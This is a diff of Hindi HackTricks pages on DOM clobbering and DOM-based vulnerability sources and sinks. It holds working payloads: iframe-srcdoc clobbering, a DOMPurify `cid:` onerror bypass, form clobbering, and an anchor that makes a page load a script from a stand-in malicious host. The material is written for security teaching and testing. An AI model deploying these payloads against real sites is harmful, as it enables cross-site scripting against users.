@ -57,7 +57,7 @@ Clobbering अधिक विशेषताएँ **अधिक जटिल
स्टाइल टैग का उपयोग **आईफ्रेम को रेंडर करने के लिए पर्याप्त समय देने** के लिए किया जाता है। इसके बिना आपको **अनिर्धारित** अलर्ट मिलेगा। स्टाइल टैग का उपयोग **आईफ्रेम को रेंडर करने के लिए पर्याप्त समय देने** के लिए किया जाता है। इसके बिना आपको **अनिर्धारित** अलर्ट मिलेगा।
{% endhint %} {% endhint %}
गहरे गुणों को अधिक बदलने के लिए, आप **एचटीएमएल एन्कोडिंग के साथ आईफ्रेम्स** का उपयोग कर सकते हैं: गहरे गुणों को अधिक बदलने के लिए, आप **एचटीएमएल एन्कोडिंग के साथ आईफ्रेम्स** का उपयोग कर सकते हैं इस प्रकार:
```html ```html
<iframe name=a srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe> <iframe name=a srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
<style>@import 'https://google.com';</style> <style>@import 'https://google.com';</style>
@ -67,7 +67,7 @@ alert(a.b.c.d.e)//controlled
``` ```
### **फ़िल्टर बाईपासिंग** ### **फ़िल्टर बाईपासिंग**
यदि एक फ़िल्टर नोड की **संपत्तियों** के **माध्यम से लूप** कर रहा है जैसे कि `document.getElementByID('x').attributes` तो आप **एट्रिब्यूट** **`.attributes`** को **क्लॉबर** कर सकते हैं और **फ़िल्टर को तोड़ सकते हैं**। अन्य DOM संपत्तियाँ जैसे **`tagName`**, **`nodeName`** या **`parentNode`** और भी **क्लॉबर** किए जा सकते हैं यदि एक फ़िल्टर नोड की **संपत्तियों** के **माध्यम से लूप** कर रहा है जैसे कि `document.getElementByID('x').attributes` तो आप **विशेषता** **`.attributes`** को **ओवरराइड** कर सकते हैं और **फ़िल्टर को तोड़ सकते हैं**। अन्य DOM गुण संबंधित भी **ओवरराइड** किए जा सकते हैं जैसे **`tagName`**, **`nodeName`** या **`parentNode`** और अधिक
```html ```html
<form id=x></form> <form id=x></form>
<form id=y> <form id=y>
@ -80,15 +80,15 @@ console.log(document.getElementById('y').nodeName)//[object HTMLInputElement]
``` ```
## **`window.someObject` को Clobber करना** ## **`window.someObject` को Clobber करना**
जावास्क्रिप्ट में यह आम है कि हमें यह मिलता है: जावास्क्रिप्ट में यह आम है कि हमें निम्नलिखित मिलता है:
```javascript ```javascript
var someObject = window.someObject || {}; var someObject = window.someObject || {};
``` ```
वेब पृष्ठ पर HTML को मनिपुलेट करने से `someObject` को एक DOM नोड से ओवरराइड किया जा सकता है, सुरक्षा विकल्पों को प्रवेश करने की संभावना हो सकती है। उदाहरण के लिए, आप `someObject` को एक आपत्तिजनक स्क्रिप्ट की ओर इशारा करने वाले एंकर तत्व के साथ बदल सकते हैं: वेब पृष्ठ पर HTML को मनिपुलेट करने से `someObject` को एक DOM नोड से ओवरराइड किया जा सकता है, जिससे सुरक्षा संवैधानिकता उत्पन्न हो सकती है। उदाहरण के लिए, आप `someObject` को एक आपत्तिजनक स्क्रिप्ट की ओर इशारा करने वाले एंकर तत्व से बदल सकते हैं:
```html ```html
<a id=someObject href=//malicious-website.com/malicious.js></a> <a id=someObject href=//malicious-website.com/malicious.js></a>
``` ```
एक वंलरबल कोड में जैसे: एक वंलरबल कोड में जैसे:
```html ```html
<script> <script>
window.onload = function(){ window.onload = function(){
@ -101,9 +101,9 @@ document.body.appendChild(script);
``` ```
यह विधि अनचाहे कोड को निष्पादित करने के लिए स्क्रिप्ट स्रोत का शोषण करती है। यह विधि अनचाहे कोड को निष्पादित करने के लिए स्क्रिप्ट स्रोत का शोषण करती है।
**ट्रिक**: **`DOMPurify`** आपको **`cid:`** प्रोटोकॉल का उपयोग करने देता है, ज**डबल-कोट्स को URL-encode नहीं करता है**। इसका मतलब है कि आप **कोड को रनटाइम पर डीकोड करने वाला एक एन्कोडेड डबल-कोट** इंजेक्ट कर सकते हैं। इसलिए, कुछ इंजेक्ट करना जैसे **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** HTML एन्कोडेड `&quot;` को **रनटाइम पर डीकोड** कर देगा और **एट्रिब्यूट मान से बचने** के लिए **`onerror`** इवेंट बनाएगा। **ट्रिक**: **`DOMPurify`** आपको **`cid:`** प्रोटोकॉल का उपयोग करने देता है, जिसमें **डबल-कोट्स को URL-encode नहीं किया जाता है**। इसका मतलब है कि आप **कोड को रनटाइम पर डीकोड करने वाले एक एन्कोडेड डबल-कोट को इंजेक्ट कर सकते हैं**। इसलिए, कुछ इंजेक्ट करना जैसे **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** HTML एन्कोडेड `&quot;` को **रनटाइम पर डीकोड करने** और **एट्रिब्यूट मान से बचने** के लिए **`onerror`** इवेंट बनाएगा।
एक और तकनीक **`form`** एलिमेंट का उपयोग करती है। कुछ क्लाइंट-साइड लाइब्रेरी नए बनाए गए फॉर्म एलिमेंट के विशेषताओं की जांच करती हैं उन्हें साफ करने के लिए। हालांकि, एक `input` को फॉर्म के अंदर `id=attributes` के साथ जोड़कर, आप वास्तव में एट्रिब्यूट्स प्रॉपर्टी को अधिलेखित कर देते हैं, जिससे सैनिटाइजर को वास्तविक एट्रिब्यूट्स तक पहुंचने से रोक देते हैं। एक और तकनीक एक **`form`** तत्व का उपयोग करती है। कुछ क्लाइंट-साइड लाइब्रेरी नए बनाए गए फॉर्म तत्वों के विशेषताओं की जांच करती हैं उन्हें साफ करने के लिए। हालांकि, फॉर्म के अंदर `input` को `id=attributes` के साथ जोड़कर, आप वास्तव में एट्रिब्यूट्स प्रॉपर्टी को अधिलेखित कर देते हैं, जिससे सैनिटाइजर को वास्तविक एट्रिब्यूट्स तक पहुंचने से रोक देते हैं।
आप [**इस प्रकार के clobbering का उदाहरण इस CTF लेख में पा सकते हैं**](iframes-in-xss-and-csp.md#iframes-in-sop-2)। आप [**इस प्रकार के clobbering का उदाहरण इस CTF लेख में पा सकते हैं**](iframes-in-xss-and-csp.md#iframes-in-sop-2)।
@ -126,9 +126,9 @@ HTMLCollection(2) [img, form, cookie: img]
typeof(document.cookie) typeof(document.cookie)
'object 'object
``` ```
## तत्व को अद्वितीय आईडी के साथ अद्वितीय एचटीएमएल या बॉडी टैग डालने के बाद लिखना ## तत्व को अद्वितीय आईडी के साथ अद्वितीय आईडी के साथ `<html>` या `<body>` टैग डालने के बाद लिखना
**`document.getElementById()`** और **`document.querySelector()`** के कॉल के परिणाम को एक अद्वितीय आईडी विशेषक के साथ `<html>` या `<body>` टैग इंजेक्ट करके बदला जा सकता है। यहाँ यह कैसे किया जा सकता है: **`document.getElementById()`** और **`document.querySelector()`** के कॉल के परिणाम को एक अद्वितीय आईडी के साथ `<html>` या `<body>` टैग इंजेक्ट करके बदला जा सकता है। यहाँ देखें कि यह कैसे किया जा सकता है:
```html ```html
<div style="display:none" id="cdnDomain" class="x">test</div> <div style="display:none" id="cdnDomain" class="x">test</div>
<p> <p>
@ -158,7 +158,7 @@ alert(document.getElementById('cdnDomain').innerText); // Clobbered
alert(document.getElementById('cdnDomain').innerText); // Clobbered alert(document.getElementById('cdnDomain').innerText); // Clobbered
</script> </script>
``` ```
चाहे वह Chrome हो या Firefox, SVG में HTML टैग कार्य करने के लिए, `<foreignobject>` टैग आवश्यक है: चाहे वह Chrome हो या Firefox, SVG में HTML टैग कार्य करने के लिए `<foreignobject>` टैग आवश्यक है:
```html ```html
<div style="display:none" id="cdnDomain">example.com</div> <div style="display:none" id="cdnDomain">example.com</div>
<svg> <svg>
@ -172,7 +172,7 @@ alert(document.getElementById('cdnDomain').innerText); // Clobbered
``` ```
## Clobbering Forms ## Clobbering Forms
एक फॉर्म के अंदर **नए एंट्रीज जोड़ना संभव** है बस **कुछ टैग्स के अंदर `form` विशेषिता** को **निर्दिष्ट करके**। आप इसका उपयोग **फॉर्म के अंदर नए मान जोड़ने** और नए **बटन** भी **जोड़ सकते** हैं ताकि इसे **भेजा जा सके** (क्लिकजैकिंग या कुछ `.click()` JS कोड का दुरुपयोग करना): यह संभव है कि **फ़ॉर्म के अंदर नए एंट्रीज़ जोड़ी जा सकती हैं** बस **कुछ टैग्स के अंदर `form` विशेषिता** को निर्दिष्ट करके। आप इसका उपयोग **फॉर्म के अंदर नए मान जोड़ने** और नए **बटन** भी जोड़ने के लिए कर सकते हैं **इसे भेजने के लिए** (क्लिकजैकिंग या कुछ `.click()` JS कोड का दुरुपयोग करना):
```html ```html
<!--Add a new attribute and a new button to send--> <!--Add a new attribute and a new button to send-->
<textarea form=id-other-form name=info> <textarea form=id-other-form name=info>
@ -196,10 +196,10 @@ Click to send!
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)। * **अपने हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>

View file

@ -7,22 +7,22 @@
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन करें**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में** * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में**
</details> </details>
## DOM सुरक्षा दोष ## DOM सुरक्षा दोष
DOM सुरक्षा दोष उस समय होते हैं जब हमलावर नियंत्रित **स्रोतों** से डेटा (जैसे `location.search`, `document.referrer`, या `document.cookie`) को असुरक्षित रूप से **सिंक** में स्थानांतरित किया जाता है। सिंक वे फ़ंक्शन या ऑब्जेक्ट होते हैं (जैसे `eval()`, `document.body.innerHTML`) जो यदि दुरुपयोगी डेटा दिया जाए तो हानिकारक सामग्री का निष्पादन या प्रदर्शन कर सकते हैं। DOM सुरक्षा दोष उस समय होते हैं जब हमलावर नियंत्रित **स्रोतों** से डेटा (जैसे `location.search`, `document.referrer`, या `document.cookie`) को असुरक्षित रूप से **सिंक्स** में स्थानांतरित किया जाता है। सिंक्स वे फ़ंक्शन या ऑब्जेक्ट्स होते हैं (जैसे `eval()`, `document.body.innerHTML`) जो अगर दुरुपयोगी डेटा दिया जाए तो हानिकारक सामग्री का निष्पादन या प्रदर्शन कर सकते हैं।
- **स्रोत** वे इनपुट होते हैं जिन्हें हमलावार द्वारा नियंत्रित किया जा सकता है, जैसे URLs, कुकीज़, और वेब संदेश। - **स्रोत** हैं वह इनपुट्स जो हमलावर द्वारा बदला जा सकता है, जैसे URLs, कुकीज़, और वेब संदेश।
- **सिंक** वे संभावित खतरनाक अंत-बिंदु होते हैं जहाँ दुरुपयोगी डेटा नुकसानकारी प्रभावों में ले सकता है, जैसे स्क्रिप्ट निष्पादन। - **सिंक्स** वे संभावित खतरनाक अंत-बिंदु हैं जहाँ दुरुपयोगी डेटा नुकसानकारी प्रभावों में ले सकता है, जैसे स्क्रिप्ट निष्पादन।
जोखिम उत्पन्न होता है जब डेटा स्रोत से सिंक में सही मान्यता या स्वच्छिकरण के बिना बहता है, जिससे XSS जैसे हमले संभव होते हैं। जोखिम उत्पन्न होता है जब डेटा स्रोत से सिंक्स में सही मान्यता या स्वच्छिकरण के बिना बहता है, जिससे XSS जैसे हमले संभव होते हैं।
{% hint style="info" %} {% hint style="info" %}
**आप** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) **में अद्यतित स्रोतों और सिंक की एक अधिक अद्यतित सूची पा सकते हैं** **आप** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) **में अद्यतित स्रोतों और सिंक्स की एक अधिक अद्यतित सूची पा सकते हैं**
{% endhint %} {% endhint %}
**सामान्य स्रोत:** **सामान्य स्रोत:**
@ -76,11 +76,11 @@ Database
| [**क्लाइंट-साइड SQL इंजेक्शन**](dom-xss.md#client-side-sql-injection) | [**वेब-संदेश मैनिपुलेशन**](dom-xss.md#web-message-manipulation) | `history.replaceState()` | `WebSocket` | | [**क्लाइंट-साइड SQL इंजेक्शन**](dom-xss.md#client-side-sql-injection) | [**वेब-संदेश मैनिपुलेशन**](dom-xss.md#web-message-manipulation) | `history.replaceState()` | `WebSocket` |
| `executeSql()` | `postMessage()` | \`\` | \`\` | | `executeSql()` | `postMessage()` | \`\` | \`\` |
**`innerHTML`** सिंक किसी भी आधुनिक ब्राउज़र पर `स्क्रिप्ट` तत्वों को स्वीकार नहीं करता है, न तो `svg onload` घटनाएँ फायर होंगी। इसका मतलब है कि आपको `img` या `iframe` जैसे विकल्प तत्वों का उपयोग करना होगा। **`innerHTML`** सिंक किसी भी आधुनिक ब्राउज़र पर `script` तत्वों को स्वीकार नहीं करता, ना ही `svg onload` घटनाएँ चलेंगी। इसका मतलब है कि आपको `img` या `iframe` जैसे विकल्प तत्वों का उपयोग करना होगा।
इस प्रकार का XSS शायद **सबसे मुश्किल** होता है, क्योंकि आपको JS कोड के अंदर देखना होगा, देखना होगा कि क्या कोई वस्तु है जिसका आप **नियंत्रण** कर सकते हैं, और उस मामले में, यह देखना होगा कि क्या कोई **तरीका है** जिससे आप इसे अर्बिट्रेरी JS को निष्पादित करने के लिए दुरुपयोग कर सकते हैं। इस प्रकार का XSS शायद **सबसे मुश्किल** होता है, क्योंकि आपको JS कोड के अंदर देखना होगा, देखना होगा कि क्या कोई वस्तु है जिसका **मूल्य आप नियंत्रित करते हैं**, और उस मामले में, यह देखना होगा कि क्या कोई **तरीका है** जिससे आप इसे अर्बिट्रेरी JS चला सकते हैं।
## इन्हें खोजने के लिए उपकरण ## इसे खोजने के लिए उपकरण
* [https://github.com/mozilla/eslint-plugin-no-unsanitized](https://github.com/mozilla/eslint-plugin-no-unsanitized) * [https://github.com/mozilla/eslint-plugin-no-unsanitized](https://github.com/mozilla/eslint-plugin-no-unsanitized)
@ -92,7 +92,7 @@ Database
**DOM में ओपन रीडायरेक्ट सुरक्षा दोष** उस समय होता है जब एक स्क्रिप्ट डेटा लिखता है, जिसे एक हमलावर नियंत्रित कर सकता है, एक सिंक में जो डोमेन के बीच नेविगेशन प्रारंभ करने की क्षमता रखता है। **DOM में ओपन रीडायरेक्ट सुरक्षा दोष** उस समय होता है जब एक स्क्रिप्ट डेटा लिखता है, जिसे एक हमलावर नियंत्रित कर सकता है, एक सिंक में जो डोमेन के बीच नेविगेशन प्रारंभ करने की क्षमता रखता है।
यह महत्वपूर्ण है कि अर्बिट्रेरी कोड को निष्पादित करना, जैसे कि **`javascript:alert(1)`**, संभव है अगर आपके पास नियंत्रण है URL के शुरुआत पर जहाँ पुनर्निर्देशन होता है। यह महत्वपूर्ण है कि अर्बिट्रेरी कोड को निष्पादित करना, जैसे कि **`javascript:alert(1)`**, संभव है अगर आपके पास नियंत्रण है URL के पारंभ में जहाँ पुनर्निर्देशन होता है।
सिंक: सिंक:
```javascript ```javascript
@ -116,7 +116,7 @@ $.ajax()
स्रोत: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation) स्रोत: [https://portswigger.net/web-security/dom-based/cookie-manipulation](https://portswigger.net/web-security/dom-based/cookie-manipulation)
DOM-आधारित कुकी-मैनिपुलेशन सुरक्षा दोष उत्पन्न होता है जब एक स्क्रिप्ट एक हमलावादी द्वारा नियंत्रित किया जा सकने वाला डेटा कुकी के मान में शामिल करता है। यह दोष अगर कुकी साइट के भीतर उपयोग किया जाता है तो वेबपेज के अप्रत्याशित व्यवहार की ओर ले जा सकता है। इसके अतिरिक्त, इसका शोषण किया जा सकता है ताकि यदि कुकी उपयोगकर्ता सत्रों को ट्रैक करने में शामिल है तो एक सत्र स्थापना हमला किया जा सकता है। इस दोष से संबंधित मुख्य सिंक है: DOM-आधारित कुकी-मैनिपुलेशन सुरक्षा दोष उत्पन्न होता है जब एक स्क्रिप्ट एक हमलावादी द्वारा नियंत्रित किया जा सकने वाला डेटा कुकी के मान में शामिल करता है। यह दोष अगर कुकी साइट के भीतर उपयोग किया जाता है तो पृष्ठभूमि के अप्रत्याशित व्यवहार की ओर ले जा सकता है। इसके अतिरिक्त, इसका शोषण किया जा सकता है ताकि उपयोगकर्ता सत्रों का ट्रैकिंग करने में कुकी शामिल हो। इस दोष से संबंधित मुख्य सिंक है:
सिंक: सिंक:
```javascript ```javascript
@ -145,11 +145,11 @@ crypto.generateCRMFRequest()
From: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation) From: [https://portswigger.net/web-security/dom-based/document-domain-manipulation](https://portswigger.net/web-security/dom-based/document-domain-manipulation)
**दस्तावेज़-डोमेन मानिपुलेशन सुरक्षा गड़बड़ियाँ** उस समय होती हैं जब एक स्क्रिप्ट `document.domain` गुणसूत्र को उस डेटा का उपयोग करके सेट करता है जिस पर हमलावर का नियंत्रण हो सकता है। **दस्तावेज़-डोमेन मानिपुलेशन सुरक्षा दोष** उस समय होते हैं जब एक स्क्रिप्ट `document.domain` गुणसूत्र को उस डेटा का उपयोग करके सेट करता है जिस पर हमलावर का नियंत्रण हो सकता है।
`document.domain` गुणसूत्र ब्राउज़र्स द्वारा **समान मूल सिद्धांत** के **प्रवर्तन** में एक **महत्वपूर्ण भूमिका** निभाता है। जब दो अलग-अलग मूलों से पृष्ठ अपने `document.domain` को **एक ही मान** पर सेट करते हैं, तो वे प्रतिबंधों के बिना परस्पर कार्रवाई कर सकते हैं। हालांकि, ब्राउज़र्स `document.domain` को सौंपने वाले मानों पर कुछ **सीमाएँ** लगाते हैं, वास्तविक पृष्ठ मूल को पूरी तरह से असंबंधित मानों का सौंपने से रोकते हुए, अपवाद होते हैं। सामान्यत: ब्राउज़र्स **बच्चे** या **माता-पिता डोमेन** का उपयोग करने की अनुमति देते हैं। `document.domain` गुणसूत्र ब्राउज़र्स द्वारा **समान मूल सिद्धांत** के **प्रवर्तन** में एक **महत्वपूर्ण भूमिका** निभाता है। जब दो अलग-अलग मूलों से दो पृष्ठ अपने `document.domain` को **एक ही मान** पर सेट करते हैं, तो वे प्रतिबंधों के बिना परस्पर कार्रवाई कर सकते हैं। हालांकि, ब्राउज़र्स `document.domain` को देने योग्य मानों पर कुछ **सीमाएँ** लगाते हैं, वास्तविक पृष्ठ मूल को पूरी तरह से असंबंधित मानों का निर्धारण रोकते हैं, अपवाद हो सकते हैं। सामान्यत: ब्राउज़र्स **बच्चा** या **माता-पिता डोमेन** का उपयोग स्वीकार करते हैं।
Sinks: सिंक्स:
```javascript ```javascript
document.domain document.domain
``` ```
@ -157,7 +157,7 @@ document.domain
From: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning) From: [https://portswigger.net/web-security/dom-based/websocket-url-poisoning](https://portswigger.net/web-security/dom-based/websocket-url-poisoning)
**WebSocket-URL poisoning** तब होता है जब एक स्क्रिप्ट **नियंत्रण योग्य डेटा का उपयोग करता है जैसे WebSocket कनेक्शन के लिए लक्षित URL**। **WebSocket-URL poisoning** तब होता है जब एक स्क्रिप्ट **एक WebSocket कनेक्शन के लिए लक्षित URL के रूप में नियंत्रण योग्य डेटा का उपयोग** करता है
Sinks: Sinks:
@ -167,7 +167,7 @@ Sinks:
From: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation) From: [https://portswigger.net/web-security/dom-based/link-manipulation](https://portswigger.net/web-security/dom-based/link-manipulation)
**DOM-based link-manipulation vulnerabilities** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रण योग्य डेटा को वर्तमान पृष्ठ में नेविगेशन लक्ष्य** के रूप में लिखता है, जैसे क्लिक करने योग्य लिंक या एक फॉर्म के सबमिशन URL। **DOM-based link-manipulation vulnerabilities** उत्पन्न होती है जब एक स्क्रिप्ट **वर्तमान पृष्ठ में नेविगेशन लक्ष्य के लिए हमलावर-नियंत्रण योग्य डेटा को लिखता है**, जैसे क्लिक करने योग्य लिंक या एक फॉर्म के सबमिशन URL।
Sinks: Sinks:
```javascript ```javascript
@ -179,9 +179,9 @@ someDOMElement.action
From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation) From: [https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation](https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation)
**एजेक्स अनुरोध मानिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **एक `XmlHttpRequest` ऑब्जेक्ट का उपयोग करते हुए जारी किया जाने वाले एजेक्स अनुरोध में हमलावाद-नियंत्रित डेटा लिखता है**। **एजेक्स अनुरोध मानिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **एक्सएमएलएचटीपी ऑब्जेक्ट का उपयोग करते हुए जारी किया जाने वाले एजेक्स अनुरोध में हमलावाद-नियंत्रित डेटा लिखता है**।
Sinks: सिंक्स:
```javascript ```javascript
XMLHttpRequest.setRequestHeader() XMLHttpRequest.setRequestHeader()
XMLHttpRequest.open() XMLHttpRequest.open()
@ -193,7 +193,7 @@ $.globalEval()
From: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation) From: [https://portswigger.net/web-security/dom-based/local-file-path-manipulation](https://portswigger.net/web-security/dom-based/local-file-path-manipulation)
**स्थानीय फ़ाइल-पथ मेनिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रित डेटा को एक फ़ाइल-हैंडलिंग API** के रूप में `filename` पैरामीटर के रूप में पारित करता है। एक हमलावर द्वारा इस सुरक्षा दोष का शोध किया जा सकता है ताकि वह एक URL का निर्माण कर सके जो, अगर दूसरे उपयोगकर्ता द्वारा देखा जाता है, तो उपयोगकर्ता के ब्राउज़र को एक विचित्र स्थानीय फ़ाइल खोलने या लिखने की ओर ले जा सकता है। **स्थानीय फ़ाइल-पथ मेनिपुलेशन सुरक्षा दोष** उत्पन्न होते हैं जब एक स्क्रिप्ट **हमलावर-नियंत्रित डेटा को एक फ़ाइल-हैंडलिंग API के रूप में पास** करता है जैसे `filename` पैरामीटर. यह सुरक्षा दोष एक हमलावर द्वारा उत्पन्न किया जा सकता है ताकि वह एक URL का निर्माण कर सके जो, अगर किसी अन्य उपयोगकर्ता द्वारा देखा जाता है, तो उसे उपयोगकर्ता के ब्राउज़र को खोलने या एक विचित्र स्थानीय फ़ाइल में लेखन की ओर ले जा सकता है।
Sinks: Sinks:
```javascript ```javascript
@ -209,17 +209,17 @@ FileReader.root.getFile()
From: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection) From: [https://portswigger.net/web-security/dom-based/client-side-sql-injection](https://portswigger.net/web-security/dom-based/client-side-sql-injection)
**क्लाइंट-साइड एसक्यूएल इंजेक्शन सुरक्षा गंभीरता** उस समय होती है जब एक स्क्रिप्ट **एक असुरक्षित तरीके से एक क्लाइंट-साइड एसक्यूएल क्वेरी में हमलावर-नियंत्रित डेटा शामिल करता है** **क्लाइंट-साइड एसक्यूएल-इंजेक्शन सुरक्षा दोष** उस समय होता है जब एक स्क्रिप्ट **एक असुरक्षित तरीके से एक क्लाइंट-साइड एसक्यूएल क्वेरी में हमलावर-नियंत्रित डेटा शामिल करता है**
Sinks: Sinks:
```javascript ```javascript
executeSql() executeSql()
``` ```
### HTML5-संग्रहण में परिवर्त ### HTML5-संग्रहन संशोध
From: [https://portswigger.net/web-security/dom-based/html5-storage-manipulation](https://portswigger.net/web-security/dom-based/html5-storage-manipulation) From: [https://portswigger.net/web-security/dom-based/html5-storage-manipulation](https://portswigger.net/web-security/dom-based/html5-storage-manipulation)
